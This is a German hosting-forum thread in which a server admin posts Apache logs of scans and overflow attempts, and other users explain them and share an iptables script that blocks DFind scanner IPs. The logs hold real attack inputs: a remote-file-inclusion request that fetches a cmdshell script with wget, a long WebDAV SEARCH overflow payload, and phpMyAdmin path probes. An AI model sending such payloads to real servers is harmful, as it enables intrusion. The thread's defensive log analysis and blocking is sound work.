DoS?

Schweinebauer · Mar 9, 2006

Code:

/logiasite.webcindario.com/cmdshell.txt?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
131.161.89.36 - - [06/Mar/2006:06:56:50 +0100] "GET / HTTP/1.0" 302 - "-" "-"
81.169.176.15 - - [06/Mar/2006:07:41:20 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:40 +0100] "GET /phpmyadmin/main.php HTTP/1.0" 200 12056 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:53 +0100] "GET /PMA/main.php HTTP/1.0" 404 210 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:53 +0100] "GET /mysql/main.php HTTP/1.0" 404 212 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:53 +0100] "GET /admin/main.php HTTP/1.0" 404 212 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:53 +0100] "GET /db/main.php HTTP/1.0" 404 209 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:53 +0100] "GET /dbadmin/main.php HTTP/1.0" 404 214 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:53 +0100] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 221 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:53 +0100] "GET /admin/pma/main.php HTTP/1.0" 404 216 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:53 +0100] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 223 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:53 +0100] "GET /admin/mysql/main.php HTTP/1.0" 404 218 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:53 +0100] "GET /phpmyadmin2/main.php HTTP/1.0" 404 218 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:53 +0100] "GET /mysqladmin/main.php HTTP/1.0" 404 217 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:53 +0100] "GET /mysql-admin/main.php HTTP/1.0" 404 218 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:54 +0100] "GET /main.php HTTP/1.0" 404 206 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:54 +0100] "GET /phpMyAdmin-2.5.6/main.php HTTP/1.0" 404 223 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:54 +0100] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 223 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:54 +0100] "GET /phpMyAdmin-2.5.1/main.php HTTP/1.0" 404 223 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:54 +0100] "GET /phpMyAdmin-2.2.3/main.php HTTP/1.0" 404 223 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:54 +0100] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 223 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:54 +0100] "GET /myadmin/main.php HTTP/1.0" 404 214 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:54 +0100] "GET /phpMyAdmin-2.6.0/main.php HTTP/1.0" 404 223 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:54 +0100] "GET /phpMyAdmin-2.6.0-pl1/main.php HTTP/1.0" 404 227 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:54 +0100] "GET /phpMyAdmin-2.6.3-pl1/main.php HTTP/1.0" 404 227 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:54 +0100] "GET /phpMyAdmin-2.6.3/main.php HTTP/1.0" 404 223 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:54 +0100] "GET /phpMyAdmin-2.6.3-rc1/main.php HTTP/1.0" 404 227 "-" "-"
81.169.176.15 - - [06/Mar/2006:12:12:54 +0100] "GET /phpMyAdmin-2.6.2-rc1/main.php HTTP/1.0" 404 227 "-" "-"

Code:

62.141.56.57 - - [07/Mar/2006:18:34:34 +0100] "GET /phpMyAdmin-2.5.6/main.php HTTP/1.1" 404 223 "-" "-"62.141.56.57 - - [07/Mar/2006:18:34:34 +0100] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.1" 404 223 "-" "-"62.141.56.57 - - [07/Mar/2006:18:34:34 +0100] "GET /phpMyAdmin-2.5.1/main.php HTTP/1.1" 404 223 "-" "-"
62.141.56.57 - - [07/Mar/2006:18:34:34 +0100] "GET /phpMyAdmin-2.2.3/main.php HTTP/1.1" 404 223 "-" "-"
62.141.56.57 - - [07/Mar/2006:18:34:34 +0100] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.1" 404 223 "-" "-"
62.141.56.57 - - [07/Mar/2006:18:34:34 +0100] "GET /myadmin/main.php HTTP/1.1" 404 214 "-" "-"62.141.56.57 - - [07/Mar/2006:18:34:34 +0100] "GET /phpMyAdmin-2.6.0/main.php HTTP/1.1" 404 223 "-" "-"
62.141.56.57 - - [07/Mar/2006:18:34:34 +0100] "GET /phpMyAdmin-2.6.0-pl1/main.php HTTP/1.1" 404 227 "-" "-"62.141.56.57 - - [07/Mar/2006:18:34:34 +0100] "GET /phpMyAdmin-2.6.3-pl1/main.php HTTP/1.1" 404 227 "-" "-"
62.141.56.57 - - [07/Mar/2006:18:34:34 +0100] "GET /phpMyAdmin-2.6.3/main.php HTTP/1.1" 404 223 "-" "-"
62.141.56.57 - - [07/Mar/2006:18:34:34 +0100] "GET /phpMyAdmin-2.6.3-rc1/main.php HTTP/1.1" 404 227 "-" "-"62.141.56.57 - - [07/Mar/2006:18:34:34 +0100] "GET /phpMyAdmin-2.6.2-rc1/main.php HTTP/1.1" 404 227 "-" "-"
62.179.38.229 - - [07/Mar/2006:19:26:01 +0100] "GET / HTTP/1.0" 302 - "-" "-"
                                                                                                                                   189,1         45%
67.100.171.221 - - [07/Mar/2006:19:56:06 +0100] "SEARCH /\x90\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
                                                                                                                                   190,1         52%
67.100.171.221 - - [07/Mar/2006:19:56:08 +0100] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 227 "-" "-"
195.97.30.40 - - [07/Mar/2006:20:20:14 +0100] "GET / HTTP/1.0" 302 - "-" "-"
213.93.87.186 - - [07/Mar/2006:21:06:11 +0100] "GET /phpmyadmin/main.php HTTP/1.1" 200 12056 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:12 +0100] "GET /mysql/main.php HTTP/1.1" 404 212 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:12 +0100] "GET /PMA/main.php HTTP/1.1" 404 210 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:12 +0100] "GET /admin/main.php HTTP/1.1" 404 212 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:12 +0100] "GET /db/main.php HTTP/1.1" 404 209 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:12 +0100] "GET /dbadmin/main.php HTTP/1.1" 404 214 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:12 +0100] "GET /web/phpMyAdmin/main.php HTTP/1.1" 404 221 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:12 +0100] "GET /admin/pma/main.php HTTP/1.1" 404 216 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:12 +0100] "GET /admin/phpmyadmin/main.php HTTP/1.1" 404 223 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:12 +0100] "GET /admin/mysql/main.php HTTP/1.1" 404 218 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:12 +0100] "GET /mysql-admin/main.php HTTP/1.1" 404 218 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:12 +0100] "GET /phpmyadmin2/main.php HTTP/1.1" 404 218 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:12 +0100] "GET /mysqladmin/main.php HTTP/1.1" 404 217 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:12 +0100] "GET /mysql-admin/main.php HTTP/1.1" 404 218 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:12 +0100] "GET /main.php HTTP/1.1" 404 206 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:13 +0100] "GET /phpMyAdmin-2.5.6/main.php HTTP/1.1" 404 223 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:13 +0100] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.1" 404 223 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:13 +0100] "GET /phpMyAdmin-2.5.1/main.php HTTP/1.1" 404 223 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:13 +0100] "GET /phpMyAdmin-2.2.3/main.php HTTP/1.1" 404 223 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:13 +0100] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.1" 404 223 "-" "PMAFind"
213.93.87.186 - - [07/Mar/2006:21:06:13 +0100] "GET /myadmin/main.php HTTP/1.1" 404 214 "-" "PMAFind"
67.100.171.221 - - [07/Mar/2006:21:20:29 +0100] "SEARCH /\x90\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\

Ich glaube schon daran, dass es einer ist

Aber was tun? und wieso weiss kein Mensch was von BrutePMA?

djrick · Mar 9, 2006

Es ist lediglich ein Versuch deinen Server zu attaken. Eigentlich kann man das getrost ignorieren.

Was man sonst noch machen kann:

Attacken im Apache / w00tw00t

Hi Leute, hab mir vor nem Monat einen vRootserver bei Strato geholt, weil der billiger als ein Managed Gameserver war und hab da meinen HL2DM Gameserver drauf gehostet (ich muss dazu sagen, die Installation des Gameservers hat ein paar Tage gedauert, weil ich vorher nie was mit Linux zu tun...

serversupportforum.de

Was das genau ist:

Schwachstelle macht Apache2 für DoS-Attacken anfällig

siehe hier... http://www.heise.de/security/news/meldung/52932 aber mehr als Stressen den Servers passiert wohl nicht ...

serversupportforum.de

Die Forensuche mit "x90" hätte dir diese Ergebnisse auch gebracht und deine Frage beantwortet.

Schweinebauer · Mar 9, 2006

djrick said:
Es ist lediglich ein Versuch deinen Server zu attaken. Eigentlich kann man das getrost ignorieren.

Was man sonst noch machen kann:

Attacken im Apache / w00tw00t

Hi Leute, hab mir vor nem Monat einen vRootserver bei Strato geholt, weil der billiger als ein Managed Gameserver war und hab da meinen HL2DM Gameserver drauf gehostet (ich muss dazu sagen, die Installation des Gameservers hat ein paar Tage gedauert, weil ich vorher nie was mit Linux zu tun...

serversupportforum.de

Was das genau ist:

Schwachstelle macht Apache2 für DoS-Attacken anfällig

siehe hier... http://www.heise.de/security/news/meldung/52932 aber mehr als Stressen den Servers passiert wohl nicht ...

serversupportforum.de

Die Forensuche mit "x90" hätte dir diese Ergebnisse auch gebracht und deine Frage beantwortet.

Jep, hab auch inzwischen die sache mit dem Overflow gefunden.

Das Problem, welches ich bei der Sache habe: Meine Seiten leiden ernsthaft drunter! Wordpress gibt seit Stunden nur noch Fliesstext aus, Die Datenbanken sind extrem langsahm und auch SSH reagiert lahm.

djrick · Mar 9, 2006

Ich glaube kaum dass es daran liegt, oder ist dein Log VOLL mit diesen Angriffen? Normalerweise ist das nur ein einmaliges Scannen, keine Lücke finden und Abhacken

Schweinebauer · Mar 9, 2006

djrick said:
Ich glaube kaum dass es daran liegt, oder ist dein Log VOLL mit diesen Angriffen? Normalerweise ist das nur ein einmaliges Scannen, keine Lücke finden und Abhacken

Doch, doch! Es erfolgen ständig Anfragen an den Server, überwiegend GET, dutzende pro Sekunde von IPs die einem WHOIS der Welt eingetragen sind -.-

djrick · Mar 10, 2006

Wirksames Mittel: Per IP Tables die IP sperren

h75 · Mar 29, 2006

Was denn das?

216.144.202.10 - - [29/Mar/2006:01:57:49 +0200] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 335 62.141.6x.xxx "-" "-" "-"

Das hab ich in letzter Zeit sehr oft. Und immer mit nem Smilie hinten dran.

djrick · Mar 29, 2006

Verzweifelte Scriptkiddies keine Sicherheitslücken finden

Blackbit · Dec 26, 2006

IP-Block

djrick said:
Verzweifelte Scriptkiddies keine Sicherheitslücken finden

Na, da sollte man doch auf Nummer sicher gehen und DFind selbst am eigenen Server antesten, bevor man behauptet die Kids hätten nichts gefunden.

"/w00tw00t.at.ISC.SANS.DFind

" ist eindeutig eine Signatur von DFind. DFind ist ein Tool für Windows, ich habe schon gesehen, dass Rechner die dieses Tool betrieben, selbst sämtliche Ports offen hatten und man sie problemlos über rpc-Würmchen abschiessen können. Aber man muss ja nicht gleich einen Krieg anfangen. Das ist ja nicht Sinn der Sache.

@Scheinebauer
Sorry, aber getrost ignorieren sollte man keine Funde von Exploit-Scannern, meiner Meinung nach - denn wie man weiss werden ständig neue Scanner entwickelt um aktuell zu sein.

@h75
Probier die IP's per iptables zu blockieren. Iptables zu umgehen, dürfte den Kids schon schwerer fallen. Ich mach das so:

PHP:

        #Block DFind
        for ip in `cat /var/log/apache2/error_log |grep w00tw00t | awk '{print $8}' | sed 's/]//g'  | sort -ug` ; do
                countoff=$[$countoff+1]
                countwoot=$[$countwoot+1]
                iptables -I INPUT -s $ip -j DROP
                iptables -I OUTPUT -s $ip -j DROP
        done

countoff und countwoot sind lediglich Zählvariablen in meinem Firewall-Bash-Script. Es empfiehlt sich ebenfalls diese IP's in einem File abzulegen und zusätzlich zu sperren, denn die Logs werden ja rotiert. Und die IP's könnten beim nächsten Durchlauf am Folgetag schon wieder offen sein.

Teste erst die Ausgabe des cat auf dem System, sonst sperrst du dich noch selbst

Bei Fragen hierzu schreibt mir ruhig, helfe gerne weiter, oder gebe euch noch mehr IP-Sperren für verschiedene Scans.

PS: Oops, das war ja ein ziemlich alter Post. Naja, Suchmaschinen werden schon hierher finden.

Gruß,
Blackbit

h75 · Dec 26, 2006

Vielen Dank für den Tip.

Werde das direkt mal testen.

DerFalk · Mar 20, 2007

Und hat es mir dem Script funktioniert?

biomann · Mar 22, 2009

Das Script funktioniert super, ich werde die Sache auch mal im Auge behalten. In letzter Zeit sinds ganz schön viele Anfragen geworden, vor allem wenn man bedenkt dass mein Server non-public ist, also ist das wahrscheinlich noch ne random-generated klamotte. Echt nervig!

Whistler · Mar 22, 2009

Schweinebauer said:
81.169.176.15 - - [06/Mar/2006:12:12:40 +0100] "GET /phpmyadmin/main.php HTTP/1.0" 200 12056 "-" "-"

Über diese Zeile würde ich mir Gedanken machen.
Wenn man ein PhpMyAdmin offen ins Netz stellt, sollte man schon sehr sicher sein, daß da keine aktuellen, ausnutzbaren Lücken drin sind.

djrick · Mar 23, 2009

Whistler said:
Über diese Zeile würde ich mir Gedanken machen.

Ich hoffe er hats in der Zwischenzeit* getan

*

Code:

[06/Mar/[B]2006[/B]:12:12:40 +0100]

DoS?

Schweinebauer

Registered User

djrick

Registered User

Attacken im Apache / w00tw00t

Schwachstelle macht Apache2 für DoS-Attacken anfällig

Schweinebauer

Registered User

Attacken im Apache / w00tw00t

Schwachstelle macht Apache2 für DoS-Attacken anfällig

djrick

Registered User

Schweinebauer

Registered User

djrick

Registered User

h75

Registered User

djrick

Registered User

Blackbit

New Member

h75

Registered User

DerFalk

Registered User

biomann

New Member

Whistler

Well-Known Member

djrick

Registered User

We value your privacy